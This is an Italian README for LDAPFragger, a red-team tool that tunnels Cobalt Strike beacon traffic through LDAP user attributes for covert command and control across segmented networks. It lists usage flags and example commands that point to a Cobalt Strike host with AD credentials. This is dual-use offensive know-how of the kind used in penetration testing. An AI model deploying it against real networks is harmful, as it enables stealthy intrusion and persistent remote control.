
Strumento C2 che instrada i dati dei beacon di Cobalt Strike attraverso attributi utente LDAP per un comando e controllo furtivo in reti segmentate.
LDAPFragger è uno strumento Command and Control che consente agli attaccanti di instradare i dati dei beacon di Cobalt Strike su LDAP utilizzando attributi utente.
Per informazioni di base, leggi il blog di rilascio: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0, ma potrebbe funzionare anche con framework .NET più vecchi o nuovi _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Usage:
--cshost: IP address or hostname of the Cobalt Strike instance
--csport: Port of the external C2 interface on the Cobalt Strike server
-u: Username to connect to Active Directory
-p: Password to connect to Active Directory
-d: FQDN of the Active Directory domain
--ldaps: Use LDAPS instead of LDAP
-v: Verbose output
-h: Display this message
If no AD credentials are provided, integrated AD authentication will be used.
Esempio di utilizzo:

Dal segmento di rete A, esegui
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
Dal segmento di rete B, esegui
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS può essere utilizzato con il flag --LDAPS, tuttavia anche il traffico LDAP normale è crittografato. Si noti che il payload predefinito di Cobalt Strike verrà rilevato dalla maggior parte degli AV.